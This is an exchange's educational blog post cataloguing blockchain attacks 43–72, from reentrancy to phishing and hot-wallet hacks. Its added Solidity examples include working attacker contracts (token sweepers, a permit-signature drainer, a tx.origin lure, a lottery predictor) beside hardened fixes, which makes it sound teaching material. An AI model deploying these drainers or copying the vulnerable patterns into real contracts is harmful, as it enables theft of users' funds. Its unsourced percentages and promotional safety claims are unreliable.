SuperEx Educational Series: The 50 Most Common Blockchain Attack Types (Part 3 · Attacks 43–72)

Alright, we did not expect this, but as we kept writing we ended up exceeding the original plan of "50 attack types." The list has now grown to 72. To give everyone a more complete knowledge base, we have included the common security pitfalls seen across the market. If the first two parts focused on the risks hidden in the network, cross-chain, oracle, and MEV layers, Part 3 zooms in on the battlefield closest to user assets: smart contracts, wallets, DeFi protocols, user-side attacks, and exchange-level systemic risks. Losses from these attacks are the most direct, the largest, and the most frequent, and they depend heavily on a development team's security capability, its system design philosophy, and the user's own security awareness. This part therefore covers smart-contract-level and user-end-level attack methods and proposes systematic defense recommendations from SuperEx's perspective.

Smart Contract Vulnerability Attacks: Once On-Chain Rules Are Written Wrong, Hackers Benefit Forever (43–52)

Smart contracts are automatically executed programs, but "automatic" does not mean "secure." Once a vulnerable contract is deployed, the bug can exist permanently and may be impossible to patch without an upgrade path or a migration. Below are the most common, most dangerous, and historically most costly smart contract attack patterns.
43. Reentrancy Attack

Reentrancy is one of the most iconic vulnerabilities in Ethereum history. It lets an attacker call back into a function before the contract has finished its original execution, enabling repeated withdrawals against a balance that has not yet been updated.

Classic case: The DAO attack in 2016 caused roughly $60 million in losses and led to Ethereum forking into ETH and ETC.

Simplified attack flow: the victim contract sends ETH to the attacker before updating the attacker's balance; the attacker's receive()/fallback() function re-enters withdraw(); because the balance has not been zeroed yet, the check passes again, and the cycle repeats until the contract is drained.

Many modern protocols are still broken by reentrancy, including variants that re-enter through a different function or a different contract, which shows how stealthy and destructive it remains.
44. Integer Overflow / Underflow

Attackers exploit arithmetic that wraps around to construct scenarios such as:
- Balances "going negative" and wrapping to a huge number, bypassing checks
- Massive over-minting
- Broken math logic that enables otherwise impossible execution paths

Solidity 0.8+ checks arithmetic by default and reverts on overflow, but many older contracts still depend on SafeMath, and code inside unchecked { } blocks and explicit narrowing casts remain unprotected even in 0.8.
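An added example (written for this article, not SuperEx code) showing the same token burn under pre-0.8 semantics, under 0.8 checked arithmetic, and with an explicit guard, plus the narrowing cast that 0.8 still does not check. The contract and function names are illustrative assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract BurnExamples {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Pre-0.8 semantics reproduced with `unchecked`: with a zero balance,
    // burning 1 wei wraps the balance to 2**256 - 1, an almost infinite
    // credit that every later balance check will accept.
    function burnUnchecked(uint256 amount) external {
        unchecked {
            balances[msg.sender] -= amount;
        }
    }

    // Solidity >= 0.8 default: the subtraction reverts with Panic(0x11) on
    // underflow, so the wrap above cannot happen here.
    function burnChecked(uint256 amount) external {
        balances[msg.sender] -= amount;
    }

    // Explicit guard: same safety as burnChecked, with a readable error that
    // documents the invariant instead of a bare panic.
    function burnExplicit(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient balance");
        balances[msg.sender] -= amount;
    }

    // Caveat: explicit narrowing conversions are NOT checked in 0.8.
    // toUint8(256) silently returns 0 and toUint8(257) returns 1, so a cast
    // used in accounting is a hidden overflow.
    function toUint8(uint256 x) external pure returns (uint8) {
        return uint8(x);
    }

    // The pattern used by checked-cast helpers (OpenZeppelin's SafeCast does this).
    function toUint8Checked(uint256 x) external pure returns (uint8) {
        require(x <= type(uint8).max, "value does not fit in uint8");
        return uint8(x);
    }
}
```

When auditing 0.8 code, grep for `unchecked` and for explicit casts to smaller types; those are the only places where the compiler's default checks do not apply.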
45. Approval Exploits

Approval exploits can leave user assets "permanently approved" to an attacker. The ERC-20 approval mechanism itself offers no protection here: once a DApp requests approve(spender, type(uint256).max) (written uint256(-1) in older Solidity), the spender gains unlimited transfer rights over the user's balance until the allowance is revoked. Many phishing sites and fake authorization pages steal tokens by abusing exactly this.
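An added example (written for this article, not SuperEx code) of why an unlimited allowance is dangerous: the approved contract can move tokens the user did not even hold at the time of approval. The second contract is the read-only check a wallet or dashboard could run to find such allowances. Contract names, the 2**255 "unlimited" threshold and the scanner interface are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

interface IERC20 {
    function balanceOf(address owner) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// The "DApp" contract the user approved with type(uint256).max for one swap.
// The allowance outlives that swap, so whoever controls `operator` (the deployer,
// or whoever later steals the deployer's key) can pull every token the user
// holds now or acquires later, until the user revokes the allowance.
contract UnlimitedSweeper {
    address public immutable operator;

    constructor() { operator = msg.sender; }

    function sweep(IERC20 token, address victim) external {
        require(msg.sender == operator, "not operator");
        uint256 allowed = token.allowance(victim, address(this));
        uint256 held = token.balanceOf(victim);
        uint256 amount = held < allowed ? held : allowed;
        require(token.transferFrom(victim, operator, amount), "transferFrom failed");
    }
}

// Read-only helper a wallet or dashboard can query with eth_call to list a user's
// standing allowances and flag the ones that are effectively unlimited.
contract AllowanceScanner {
    struct Finding {
        address token;
        address spender;
        uint256 allowance;
        bool unlimited; // anything >= 2**255 is treated as "unlimited"
    }

    function scan(address owner, IERC20[] calldata tokens, address[] calldata spenders)
        external
        view
        returns (Finding[] memory findings)
    {
        findings = new Finding[](tokens.length * spenders.length);
        uint256 n;
        for (uint256 i = 0; i < tokens.length; i++) {
            for (uint256 j = 0; j < spenders.length; j++) {
                uint256 a = tokens[i].allowance(owner, spenders[j]);
                if (a == 0) continue;
                findings[n++] = Finding(address(tokens[i]), spenders[j], a, a >= (1 << 255));
            }
        }
        // Trim the array to the entries actually filled.
        assembly { mstore(findings, n) }
    }
}
```

On the DApp side the fix is to request only the amount the current action needs; on the user side it is to revoke standing allowances with approve(spender, 0) once the interaction is over.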
46. Flash Loan Logic Exploit

Flash loans are not an attack in themselves, but they amplify every other vulnerability. An attacker borrows a huge amount with no collateral and, within a single transaction, uses it to:
- Manipulate prices
- Steal collateral
- Abuse liquidity pool logic
- Rewrite contract state
and repays the loan before the transaction ends, so the capital cost of the attack is only the loan fee.

Famous incidents: bZx, Harvest Finance, Alpha Finance, PancakeBunny, with combined losses in the hundreds of millions of dollars.
47. Storage Collision

Storage collision may be the biggest hidden danger of proxy contracts. Upgradeability introduces structural risk, because the proxy and its implementation share one storage space. Attack paths include:
- Incorrect storage slot mapping between proxy and implementation
- Attackers overwriting critical variables (owner, admin) through a colliding slot
- Hijacking the upgrade logic once the admin slot is controlled

Proxies are often described as "upgradeable but dangerous" structures for this reason.
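An added example (written for this article, not SuperEx code) of the collision: a proxy that keeps its admin in slot 0, an implementation whose first variable also lives in slot 0, and the EIP-1967 layout that avoids the problem. The EIP-1967 slot constants are the standard's published values; contract names are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Proxy that keeps its own state in the first storage slots.
contract NaiveProxy {
    address public admin;          // slot 0
    address public implementation; // slot 1

    constructor(address impl) {
        admin = msg.sender;
        implementation = impl;
    }

    function upgradeTo(address impl) external {
        require(msg.sender == admin, "not admin");
        implementation = impl;
    }

    fallback() external payable {
        address impl = implementation;
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// Implementation whose layout also starts at slot 0. Under delegatecall it reads
// and writes the PROXY's storage, so `totalSupply` and `admin` are the same
// 32-byte word. Calling mint(x, uint160(attacker)) through the proxy writes the
// attacker's address over `admin`; upgradeTo() is then theirs.
contract CollidingLogic {
    uint256 public totalSupply;                  // slot 0: collides with admin
    mapping(address => uint256) public balances; // slot 1: collides with implementation

    function mint(address to, uint256 amount) external {
        totalSupply += amount; // overwrites NaiveProxy.admin
        balances[to] += amount;
    }
}

// Hardened: proxy metadata lives in EIP-1967 slots, which are hash-derived and
// therefore cannot be reached by sequentially allocated implementation variables.
contract Eip1967Proxy {
    // bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1)
    bytes32 internal constant IMPL_SLOT =
        0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
    // bytes32(uint256(keccak256("eip1967.proxy.admin")) - 1)
    bytes32 internal constant ADMIN_SLOT =
        0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103;

    constructor(address impl) {
        _store(ADMIN_SLOT, msg.sender);
        _store(IMPL_SLOT, impl);
    }

    function upgradeTo(address impl) external {
        require(msg.sender == _load(ADMIN_SLOT), "not admin");
        _store(IMPL_SLOT, impl);
    }

    fallback() external payable {
        address impl = _load(IMPL_SLOT);
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    function _load(bytes32 slot) internal view returns (address a) {
        assembly { a := sload(slot) }
    }

    function _store(bytes32 slot, address a) internal {
        assembly { sstore(slot, a) }
    }
}
```

Using EIP-1967 slots removes the proxy/implementation collision, but implementation-to-implementation collisions across upgrades (a reordered or removed variable) are a separate class of the same bug; compare storage layouts before every upgrade. This minimal proxy also has no selector-clash protection, which the transparent and UUPS patterns add.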
48. Randomness Manipulation

On-chain randomness is not truly random, especially when it is derived from:
- blockhash
- block.timestamp
- miner/validator-controlled values
Attackers can predict the "random" value and manipulate:
- NFT raffles
- Game outcomes
- Jackpot drawings
- Random sorting mechanisms

In Web3 games, 80% of attacks come from predictable randomness.
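An added example (written for this article, not SuperEx code): a lottery that mixes blockhash, timestamp and caller address; an attacker contract that recomputes the identical roll in the same block; and a commit-reveal draw that fixes the player's input before the mixed-in block exists. Names, the 5-block delay and the 0.01 ether ticket are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Lottery whose "random" roll is computed from values every caller can read.
contract WeakLottery {
    uint256 public pot;

    function enter() external payable {
        require(msg.value == 0.01 ether, "ticket is 0.01 ether");
        pot += msg.value;
    }

    // BUG: the previous blockhash, the timestamp and msg.sender are all known
    // (or chosen) before this call executes, so the roll is fully predictable.
    function draw(uint256 guess) external {
        uint256 roll = uint256(keccak256(abi.encodePacked(
            blockhash(block.number - 1), block.timestamp, msg.sender
        ))) % 100;
        if (roll == guess) {
            uint256 prize = pot;
            pot = 0;
            payable(msg.sender).transfer(prize);
        }
    }
}

// Attacker contract: recomputes the exact same roll in the same block and
// submits it as the guess. Inside draw(), msg.sender is this contract, so the
// attacker hashes address(this).
contract Predictor {
    function win(WeakLottery lottery) external {
        uint256 roll = uint256(keccak256(abi.encodePacked(
            blockhash(block.number - 1), block.timestamp, address(this)
        ))) % 100;
        lottery.draw(roll);
    }

    receive() external payable {}
}

// Safer: commit-reveal with a future blockhash. The player fixes the secret
// before the mixed-in block exists, and the block producer does not know the
// secret, so neither side controls both inputs.
contract CommitRevealDraw {
    struct Commit { bytes32 hash; uint256 blockNumber; }
    mapping(address => Commit) public commits;
    uint256 public constant DELAY = 5;

    // hash = keccak256(abi.encodePacked(secret, msg.sender))
    function commit(bytes32 hash) external {
        commits[msg.sender] = Commit(hash, block.number);
    }

    function reveal(bytes32 secret) external returns (uint256 roll) {
        Commit memory c = commits[msg.sender];
        require(c.hash != bytes32(0), "no commit");
        require(keccak256(abi.encodePacked(secret, msg.sender)) == c.hash, "bad reveal");
        uint256 target = c.blockNumber + DELAY;
        require(block.number > target, "too early");
        // blockhash() returns 0 for anything older than the last 256 blocks.
        require(block.number <= target + 256, "too late, blockhash expired");
        delete commits[msg.sender];
        roll = uint256(keccak256(abi.encodePacked(secret, blockhash(target)))) % 100;
    }
}
```

Commit-reveal still leaves the producer of block `target` one bit of influence (it can withhold its block if the outcome is unfavourable), so for high-value draws a verifiable random function such as Chainlink VRF is the usual choice.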
49. Access Control Failure

One of the most common security disasters:
- onlyOwner written incorrectly
- Exposed permissions
- No restrictions on sensitive functions
- Admin address leakage

Attackers then directly call "mint," "transfer," or "upgrade contract" functions.
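An added example (written for this article, not SuperEx code) of "onlyOwner written incorrectly": a modifier that checks tx.origin instead of msg.sender, the bait contract that exploits it, an unprotected owner setter, and the hardened version with a two-step ownership transfer. Contract names are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Two classic access-control mistakes in one contract.
contract BrokenToken {
    address public owner;
    mapping(address => uint256) public balances;

    constructor() { owner = msg.sender; }

    // tx.origin is the EOA that started the transaction, not the immediate
    // caller. Any contract the owner is lured into calling can call mint()
    // and pass this check.
    modifier onlyOwnerBroken() {
        require(tx.origin == owner, "not owner");
        _;
    }

    function mint(address to, uint256 amount) external onlyOwnerBroken {
        balances[to] += amount;
    }

    // No restriction at all: anyone can take over the contract.
    function setOwner(address newOwner) external {
        owner = newOwner;
    }
}

// Bait contract exploiting the tx.origin check. Presented to the owner as an
// "airdrop claim"; if the owner's EOA calls claim(), tx.origin == owner inside mint().
contract Lure {
    BrokenToken public immutable target;
    address public immutable attacker;

    constructor(BrokenToken t) { target = t; attacker = msg.sender; }

    function claim() external {
        target.mint(attacker, 1_000_000 ether);
    }
}

// Hardened: msg.sender-based check and two-step ownership transfer, so a typo
// in the new owner address cannot hand the contract to nobody or to a stranger.
contract SafeToken {
    address public owner;
    address public pendingOwner;
    mapping(address => uint256) public balances;

    event OwnershipTransferStarted(address indexed from, address indexed to);
    event OwnershipTransferred(address indexed from, address indexed to);

    constructor() { owner = msg.sender; }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function mint(address to, uint256 amount) external onlyOwner {
        balances[to] += amount;
    }

    function transferOwnership(address newOwner) external onlyOwner {
        pendingOwner = newOwner;
        emit OwnershipTransferStarted(owner, newOwner);
    }

    function acceptOwnership() external {
        require(msg.sender == pendingOwner, "not pending owner");
        emit OwnershipTransferred(owner, pendingOwner);
        owner = pendingOwner;
        pendingOwner = address(0);
    }
}
```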
50. Business Logic Flaws

Some attacks are not "technical bugs" but design problems, such as:
- Incorrect liquidation logic
- Wrong pricing formulas
- Interest rate models that can be manipulated
- AMM weight errors
- Withdrawal ordering flaws

The 2022 Mango Markets incident came down to letting a user inflate the value of their own collateral (by pushing up the MNGO price on thin markets) and then borrowing against it.
51. Cross-contract Interaction Bugs

Contract A calls contract B, but B behaves differently than A assumed, leading to:
- Broken invariants
- Incorrect state
- Malicious counter-actions by receiver contracts (for example, a receiver hook that calls back into A)

These are common in long-tail projects, and the risk is hard to predict because it lives in the interaction rather than in either contract alone.
52. Unchecked Return Values

Some ERC-20 tokens do not return a bool from transfer/transferFrom (USDT is the best-known example), and others return false instead of reverting. A protocol that ignores the return value treats a failed transfer as successful, crediting a deposit that never arrived. Attackers have exploited this to steal millions.
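An added example (written for this article, not SuperEx code): a vault that drops the return value, and a small safe-transfer library that rejects a revert, rejects an explicit false, and still accepts the empty return data of a USDT-style token. It follows the approach of OpenZeppelin's SafeERC20 but is not that library; contract and library names are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Vulnerable: the bool returned by transferFrom is ignored. With a token that
// returns false instead of reverting, no tokens move but the caller is credited
// and can later withdraw real tokens deposited by other users.
contract NaiveVault {
    IERC20 public immutable token;
    mapping(address => uint256) public credit;

    constructor(IERC20 t) { token = t; }

    function deposit(uint256 amount) external {
        token.transferFrom(msg.sender, address(this), amount); // return value dropped
        credit[msg.sender] += amount;
    }

    function withdraw(uint256 amount) external {
        credit[msg.sender] -= amount;
        token.transfer(msg.sender, amount); // same bug on the way out
    }
}

// Writing `require(token.transferFrom(...))` fixes the false-returning token but
// breaks on a token like USDT that returns nothing: the ABI decoder reverts
// because it expects 32 bytes. The low-level call below handles both cases.
library SafeERC20Lite {
    function safeTransferFrom(IERC20 token, address from, address to, uint256 amount) internal {
        _call(address(token), abi.encodeCall(IERC20.transferFrom, (from, to, amount)));
    }

    function safeTransfer(IERC20 token, address to, uint256 amount) internal {
        _call(address(token), abi.encodeCall(IERC20.transfer, (to, amount)));
    }

    function _call(address token, bytes memory data) private {
        // A call to an address with no code "succeeds" with empty return data,
        // which would otherwise look exactly like a USDT-style success.
        require(token.code.length > 0, "token is not a contract");
        (bool ok, bytes memory ret) = token.call(data);
        require(ok, "token call reverted");
        require(ret.length == 0 || abi.decode(ret, (bool)), "token returned false");
    }
}

contract SafeVault {
    using SafeERC20Lite for IERC20;

    IERC20 public immutable token;
    mapping(address => uint256) public credit;

    constructor(IERC20 t) { token = t; }

    function deposit(uint256 amount) external {
        token.safeTransferFrom(msg.sender, address(this), amount);
        credit[msg.sender] += amount;
    }

    function withdraw(uint256 amount) external {
        credit[msg.sender] -= amount; // checked arithmetic reverts on overdraw
        token.safeTransfer(msg.sender, amount);
    }
}
```

A successful transfer still does not guarantee that `amount` arrived: fee-on-transfer and rebasing tokens deliver less. Where such tokens are accepted, credit the difference between the contract's balance before and after the transfer rather than the requested amount.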
DeFi Attacks: Design Flaws Can Be More Terrifying Than Code Bugs (53–59)

Remember airplane cabin doors, and why they are still closed manually? Simple: the more precise and complex a mechanism is, the more ways it has to fail. DeFi protocols are complex compositions of smart contracts, which gives rise to an endless supply of design vulnerabilities. Below are the most typical and most deadly DeFi attack patterns.

53. Liquidity Drain Attacks

An attacker often needs only:
- A small deposit
- Oracle or asset price manipulation
- A way to drain the liquidity pool at the manipulated price

Common in:
- AMMs
- Small-coin liquidity pools
- Rug-pull projects
54. Multi-pool Arbitrage Exploit

Attackers use flash loans to manipulate several pools at once, triggering:
- Wrong liquidations
- Wrong pricing
- Wrong collateral valuation

The more complex the structure, the easier it is to take apart and attack.
55. Liquidation Bot Frontrunning

Attackers act before a liquidation lands and use MEV (priority fees, bundles) to secure liquidation priority, maximizing their profit. Other users often suffer worse liquidations as a result, and the protocol itself can be harmed.
56. Collateral Ratio Manipulation in Lending Protocols

Attackers briefly manipulate a price to inflate the value of their collateral, then:
- Borrow large amounts of stablecoins against it
- Cash out all of the collateral
- Leave the protocol holding bad debt

Beanstalk and Cream Finance have both been hit by attacks of this kind.
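An added example (written for this article, not SuperEx code) that serves both the flash loan section (46) and the collateral manipulation described here (56): a lending contract that values collateral at an AMM's spot reserve ratio, which one flash-loan-funded swap can move, beside a version that uses a time-weighted average built from the pair's cumulative price. It assumes a Uniswap V2-style pair; the interface subset, names, the 75% LTV and the 30-minute window are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Subset of the Uniswap V2 pair interface (assumption: a V2-style constant-product pool).
interface IPair {
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint256);
}

// Vulnerable: collateral (token0) is valued at the pool's current reserve ratio.
contract SpotPriceLending {
    IPair public immutable pair;            // token0 = collateral, token1 = stablecoin
    uint256 public constant LTV_BPS = 7500; // borrow up to 75% of collateral value

    constructor(IPair p) { pair = p; }

    // reserve1 / reserve0 is the spot price. One flash-loan-funded swap of token1
    // into the pool raises it by orders of magnitude for the rest of the
    // transaction; the attacker borrows against the inflated value, swaps back,
    // repays the flash loan and leaves the protocol with bad debt.
    function collateralValue(uint256 amount) public view returns (uint256) {
        (uint112 r0, uint112 r1, ) = pair.getReserves();
        return amount * uint256(r1) / uint256(r0);
    }

    function maxBorrow(uint256 collateralAmount) external view returns (uint256) {
        return collateralValue(collateralAmount) * LTV_BPS / 10_000;
    }
}

// Hardened: a time-weighted average price. Moving a 30-minute TWAP by the same
// factor requires holding the pool at the manipulated price for many blocks,
// which exposes the attacker to arbitrage for the whole window.
contract TwapLending {
    IPair public immutable pair;
    uint256 public constant LTV_BPS = 7500;
    uint32 public constant PERIOD = 30 minutes;

    uint256 private priceCumulativeLast;
    uint32 private timestampLast;
    uint256 public priceAverageQ112; // token1 per token0 as UQ112.112 fixed point

    constructor(IPair p) {
        pair = p;
        priceCumulativeLast = p.price0CumulativeLast();
        (, , timestampLast) = p.getReserves();
    }

    // Anyone may call once PERIOD has elapsed. Simplification (assumption): the
    // pair's stored cumulative price is taken as current; production code should
    // extrapolate it to the current block (Uniswap's currentCumulativePrices).
    function update() external {
        (, , uint32 ts) = pair.getReserves();
        uint256 cum = pair.price0CumulativeLast();
        uint32 elapsed;
        uint256 delta;
        unchecked {
            // Both counters are designed to wrap (uint32 seconds, uint256 cumulative);
            // the differences stay correct across a wrap.
            elapsed = ts - timestampLast;
            delta = cum - priceCumulativeLast;
        }
        require(elapsed >= PERIOD, "window not elapsed");
        priceAverageQ112 = delta / elapsed;
        priceCumulativeLast = cum;
        timestampLast = ts;
    }

    function collateralValue(uint256 amount) public view returns (uint256) {
        require(priceAverageQ112 != 0, "oracle not updated yet");
        return (amount * priceAverageQ112) >> 112;
    }

    function maxBorrow(uint256 collateralAmount) external view returns (uint256) {
        return collateralValue(collateralAmount) * LTV_BPS / 10_000;
    }
}
```

A TWAP raises the cost of manipulation; it does not make it impossible for thin pools, and it lags real price moves. Production lending protocols typically combine a TWAP or an external oracle with sanity bounds, per-asset borrow caps and a delay between deposit and borrow.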
57. Algorithmic Stablecoin Attacks

Most algorithmic stablecoins of the past few years have collapsed or lost their peg: LUNA/UST, IRON, FEI, Basis Cash. Attack methods include:
- Overloading the system with sell pressure
- Death-spiral arbitrage by speculators
- Oracle manipulation that accelerates the depeg

Algorithmic stablecoins are considered one of the most structurally fragile designs in DeFi.
58. Curve LP Token Manipulation

Curve's StableSwap design is complex. If its pricing formula, or the LP token valuation built on top of it, is exploited:
- Exchange ratios drift
- LP token prices get manipulated (and any protocol using them as collateral is misled)
- Users suffer in-pool slippage attacks
59. NFT Floor Price Manipulation

Attackers use:
- Wash trading
- Fake fills
- High listing manipulation
- Low-liquidity market manipulation
to distort floor prices, then borrow against the inflated floor on NFT lending protocols such as NFTfi.
Wallet / Key Attacks: Real Risks at Zero Distance From User Assets (60–65)

This category has the highest frequency in Web3 security.

60. Private Key Compromise

Most common causes:
- Phishing sites
- Fake wallet apps
- Cloud storage leaks (seed phrases kept in notes, screenshots, or backups)
- Weak random number generators
- Social engineering

Once a private key is stolen, the assets are effectively unrecoverable: there is no reset and no chargeback.
61. Seed Phrase Phishing

Common methods:
- Fake Ledger recovery sites
- Fake exchange airdrop events
- Fake airdrop claim pages

A single seed phrase entry is enough for attackers to take everything.
62. Signature-Induced Attacks

Attackers do not need the private key; they only need to trick the user into signing a message. The signature can result in:
- Permanent approvals
- Mint permissions being transferred
- Token approvals
- Permit() attacks (an EIP-2612 permit signature creates an allowance without any transaction from the victim)

This is one of the most overlooked yet most dangerous actions in everyday DeFi use.
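An added example (written for this article, not SuperEx code) of a Permit() attack and of the check that belongs in front of it: the contract behind a "sign to claim" page that converts the victim's signature into an allowance and spends it in one transaction, and a read-only helper that rebuilds the EIP-712 digest being signed and applies red-flag heuristics. The interface subset is the EIP-2612 standard; contract names and the heuristics (unlimited value, deadline more than 30 days out, spender without code) are assumptions for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Subset of EIP-2612 (permit-enabled ERC-20).
interface IERC20Permit {
    function permit(address owner, address spender, uint256 value, uint256 deadline,
                    uint8 v, bytes32 r, bytes32 s) external;
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function nonces(address owner) external view returns (uint256);
    function DOMAIN_SEPARATOR() external view returns (bytes32);
}

// The victim signs an off-chain message; the attacker submits it and spends the
// resulting allowance in the same transaction. The victim never sends a
// transaction and pays no gas, so nothing shows up in their activity until the
// tokens are gone.
contract PermitDrainer {
    address public immutable operator;

    constructor() { operator = msg.sender; }

    function drain(
        IERC20Permit token, address victim, uint256 value, uint256 deadline,
        uint8 v, bytes32 r, bytes32 s
    ) external {
        require(msg.sender == operator, "not operator");
        token.permit(victim, address(this), value, deadline, v, r, s); // signature -> allowance
        require(token.transferFrom(victim, operator, value), "transferFrom failed");
    }
}

// Read-only helper that rebuilds the EIP-712 digest a wallet is being asked to
// sign and applies simple red-flag heuristics to its fields.
contract PermitInspector {
    bytes32 public constant PERMIT_TYPEHASH =
        keccak256("Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)");

    // Matches what the token's permit() will verify; compare it with the hash a
    // wallet shows when it displays the raw digest.
    function digest(IERC20Permit token, address owner, address spender, uint256 value, uint256 deadline)
        external view returns (bytes32)
    {
        bytes32 structHash = keccak256(abi.encode(
            PERMIT_TYPEHASH, owner, spender, value, token.nonces(owner), deadline
        ));
        return keccak256(abi.encodePacked("\x19\x01", token.DOMAIN_SEPARATOR(), structHash));
    }

    // Heuristics (assumptions, not part of any standard): unlimited value, a
    // deadline far in the future, or a spender that is a plain account rather
    // than a contract. Legitimate DApps ask for a bounded value, a short
    // deadline, and a known contract as spender.
    function isSuspicious(address spender, uint256 value, uint256 deadline)
        external view returns (bool)
    {
        bool unlimited = value >= (1 << 255);
        bool farFuture = deadline > block.timestamp + 30 days;
        bool spenderIsEoa = spender.code.length == 0;
        return unlimited || farFuture || spenderIsEoa;
    }
}
```

The practical lesson for users is that the three fields to read in a permit prompt are spender, value and deadline; for wallet developers it is that a typed-data signature deserves the same warning screen as a token approval transaction.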
63. Fake Wallet / Fake Plugin Attacks

Attackers create:
- Fake MetaMask
- Fake Rabby
- Fake Phantom

After installation, the fake wallet uploads the private keys or silently changes transaction targets.
64. Malicious Contract Approval

Users accidentally grant permanent approvals to an attacker's contract, and the funds are drained immediately, or at any later time while the allowance stands.
65. Address Poisoning

Attackers send tiny transfers from addresses that look like ones the user transacts with often (same first and last characters). When the user later copies an address out of their transaction history, they pick the attacker's look-alike and send a large sum to it.
User-side Attacks: Most Losses Aren't Caused by Hackers, But by Users (66–69)

66. Phishing Attack

Common channels:
- Telegram
- Discord
- Twitter
- Fake airdrops
- Fake official websites

80% of personal asset losses come from phishing.
67. Social Engineering Attacks

Attackers impersonate:
- Official customer support
- Project admins
- Partners
- Community staff
to trick users into revealing private keys or seed phrases, or into granting approvals.
68. Malicious Extensions

Some browser extensions can:
- Read the clipboard
- Steal cookies
- Hijack network requests
- Replace transaction targets

Web3 users must avoid unknown extensions.
69. Keylogger + ClipMiner

Clippers replace copied addresses; keyloggers record seed phrases as they are typed. Both are extremely stealthy and highly destructive.
Exchange & Platform-level Attacks: Once a Centralized Platform Is Breached, Losses Scale Without Limit (70–72)

SuperEx places extreme emphasis on system security and has maintained a record of 100% fund safety to date. Exchange-level attacks nevertheless remain highly dangerous, because a single successful breach can mean billion-dollar losses. Common attack types include:

70. Hot Wallet Hack

Attackers break through private key management systems, ops permissions, servers, and withdrawal whitelists to drain hot wallets. Historically this is the biggest source of exchange losses.
71. Insider Attack

Internal employee risks include:
- Illegally exporting private keys
- Abusing cold-wallet signing procedures
- Modifying database balances
- Interfering with the withdrawal system

Most compliant exchanges mitigate this with MPC key management plus multi-step approvals, so that no single employee can move funds alone.
72. API Key Leakage Attacks

Attackers use leaked API keys to:
- Withdraw funds
- Trade on the victim's account
- Manipulate markets

Many users have lost tens of thousands of dollars by committing API keys to GitHub.
How Does SuperEx Build System-level Defense?

SuperEx's security philosophy can be summarized in one sentence: not eliminating every risk, but breaking systemic risk chains. SuperEx's defense system includes:

1) Smart contract audits + dynamic risk scoring

All partnered DeFi products are audited first, and the audit is combined with on-chain historical behavior to build a risk score. Abnormal calls trigger protective fund-freezing mechanisms.
2) Super Wallet advantages

Super Wallet is a decentralized, multi-chain Hierarchical Deterministic (HD) wallet, providing security for users who interact with the DApp Open System and store large crypto assets. Super Wallet isolates assets from the platform, so they are not affected by platform security incidents, political factors, or other external events. Users hold their own private keys; the platform never has custody of them.
3) Transaction authorization risk scanning

Authorization requests are scanned for:
- Malicious contract approvals
- Permit() risks
- Phishing site interactions
with risk alerts shown to users.
4) Community security education (continuous)

Through the "SuperEx Educational Series," we continuously raise user security awareness. This article and our previous educational content are all part of that effort.

Conclusion: The Future of Web3 Is the Future of Security

In Part 1, we saw the fragility of the underlying architecture.
In Part 2, we saw systemic risks of cross-chain systems and oracles.
In Part 3, we saw the smart contract and wallet threats closest to users.
From protocols to users, from on-chain logic to cross-chain bridge structures, blockchain security has never been a single-point issue. It is a multi-layered, multi-component, interrelated ecosystem challenge.

SuperEx will continue building a globally leading security system and updating a complete Web3 risk database to provide long-term value to the industry.
This content is for informational purposes only and does not constitute investment advice.